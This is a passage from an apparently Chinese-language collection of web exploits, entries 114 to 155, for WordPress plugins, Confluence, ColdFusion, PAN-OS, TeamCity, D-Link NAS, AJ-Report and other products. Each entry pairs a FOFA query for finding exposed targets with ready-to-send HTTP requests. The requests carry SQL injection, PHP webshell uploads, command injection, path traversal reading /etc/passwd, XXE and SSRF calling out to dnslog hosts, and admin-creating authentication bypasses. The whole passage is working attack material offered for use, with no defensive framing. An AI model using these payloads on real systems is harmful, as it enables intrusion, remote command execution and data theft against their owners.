GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
114. WordPress MasterStudy LMS插件 SQL注入
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
第一步,获取网站的nonce值
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip
第二步替换nonce值,执行命令
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip
{
"postId": "1",
"nonce": "第一步获得的值",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
116. wordpress js-support-ticket文件上传
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0
----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--
117. WordPress LayerSlider插件SQL注入
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream
<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
/home/src.php
-----------------------------13979701222747646634037182887--
访问/home/src.php
119. 北京百绰智能S20后台sysmanageajax.php sql注入
CVE-2024-1254
FOFA:title="Smart管理平台"
先登录进入系统,默认账号密码为admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.11
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
120. 北京百绰智能S40管理平台导入web.php任意文件上传
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream
<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"
1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"
1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"
import
-----------------------------42328904123665875270630079328
文件路径/upload/2.php
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"
1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"
1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"
set
-----------------------------42328904123665875270630079328
boot/web/upload/weblogo/1.php
122. 北京百绰智能s200管理平台/importexport.php sql注入
CVE-2024-27718FOFA:title="Smart管理平台"
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
123. Atlassian Confluence 模板注入代码执行
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
124. 湖南建研工程质量检测系统任意文件上传
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect身份验证绕过
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
使用方法
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
创建好用户后直接登录后台,可以执行系统命令。
126. Aiohttp 路径遍历
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
127. 广联达Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"
BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
128. Adobe ColdFusion 反序列化
CVE-2023-38203
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
FOFA:app="Adobe-ColdFusion"
PAYLOAD
129. Adobe ColdFusion 任意文件读取
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
第一步,获取uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
第二步,读取/etc/passwd文件
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
130. Laykefu客服系统任意文件上传
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close
------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png
<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
131. Mini-Tmall <=20231017 SQL注入
FOFA:icon_hash="-2087517259"
后台地址:http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp
CVE-2024-27198-RCE.py
133. H5 云商城 file.php 文件上传
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream
<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
134. 网康NS-ASG应用安全网关index.php sql注入
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3版本
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3版本
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
137. 福建科立迅通信指挥调度平台down_file.php sql注入
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
142. CMSV6车辆监控平台系统中存在弱密码
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 远程命令执行
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD
144. D-Link nas_sharing.cgi 命令注入
FOFA:app="D_Link-DNS-ShareCenter"
system参数用于传要执行的命令
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip
146. MajorDoMo thumb.php 未授权远程代码执行
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close
148. CrushFTP 认证绕过模板注入
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD
149. AJ-Report开源数据大屏存在远程命令执行
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
150. AJ-Report 1.4.0 认证绕过与远程代码执行
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
151. AJ-Report 1.4.1 pageList sql注入
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
152. Progress Kemp LoadMaster 远程命令执行
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster<=7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip
153. gradio任意文件读取
CVE-2024-1561FOFA:body="__gradio_mode__"
第一步,请求/config文件获取componets的id
http://x.x.x.x/config
第二步,将/etc/passwd的内容写入到一个临时文件
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
第三步访问
http://x.x.x.x/file=/tmp/gradio/422ecef943a375e44ed4c28405458cdf49755073/passwd
154. 天维尔消防救援作战调度平台 SQL注入
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
155. 六零导航页 file.php 任意文件上传
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
